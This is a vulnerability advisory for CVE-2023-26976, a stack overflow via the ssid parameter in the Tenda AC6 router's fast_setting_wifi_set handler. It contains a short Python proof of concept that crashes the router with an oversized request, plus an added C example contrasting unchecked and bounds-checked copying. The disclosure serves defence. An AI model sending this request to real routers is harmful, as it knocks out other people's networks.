Headline
CVE-2023-26976: Vluninfo_Repo/CNVDs/AC6/205_1 at main · Funcy33/Vluninfo_Repo
Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.
Tenda Router AC6 Vulnerability
This vulnerability lies in the /goform/fast_setting_wifi_set page, which affects the latest version of Tenda Router AC6_V15.03.05.16. (The latest version is AC6_V15.03.05.19)
Vulnerability Description
There is a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set.
In function form_fast_setting_wifi_set, the user-provided parameter ssid is read into src, and this variable is passed to strcpy without any length check, which may overflow a stack-based buffer.
So by requesting the page /goform/fast_setting_wifi_set, an attacker can easily perform a denial-of-service attack.
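The unchecked copy described above, next to a length-validated version, as an added C example that is not the firmware's code and not part of the original report. The function names, the 64-byte buffer size and the choice to reject rather than truncate are assumptions for illustration; the 32-byte limit is the maximum SSID length in 802.11.

```c
#include <stddef.h>
#include <string.h>

#define SSID_BUF_LEN 64   /* assumed size; the report does not give the real one */
#define SSID_MAX_LEN 32   /* an 802.11 SSID is at most 32 octets */

/* Pattern from the description: the request parameter goes straight into a
 * fixed stack buffer. Any src of SSID_BUF_LEN bytes or more writes past
 * ssid[] and corrupts the stack frame. Shown for comparison only. */
int set_ssid_unchecked(const char *src)
{
    char ssid[SSID_BUF_LEN];
    strcpy(ssid, src);                 /* no length check */
    return (int)strlen(ssid);
}

/* Length of s, but never reading more than max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened form: validate before copying and reject invalid input outright.
 * Returns the SSID length on success, -1 if the value is empty, longer than
 * SSID_MAX_LEN, or does not fit in out (including the terminator). */
int set_ssid_checked(const char *src, char *out, size_t out_len)
{
    size_t n;

    if (src == NULL || out == NULL || out_len == 0)
        return -1;

    /* Scan one byte past the limit so "too long" is distinguishable. */
    n = bounded_len(src, SSID_MAX_LEN + 1);
    if (n == 0 || n > SSID_MAX_LEN || n >= out_len)
        return -1;

    memcpy(out, src, n);
    out[n] = '\0';
    return (int)n;
}
```

Rejecting the request in the handler, instead of silently truncating, also leaves an error path that can be logged when an oversized ssid value arrives.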
POC
import requests
IP = "10.10.10.1"
url = f"http://{IP}/goform/fast_setting_wifi_set?"
url += "ssid=" + "s" * 100
response = requests.get(url)
Timeline
2023-2-15: Reported to CVE
Acknowledgment
Credit to @Funcy_kilar from Guangzhou University.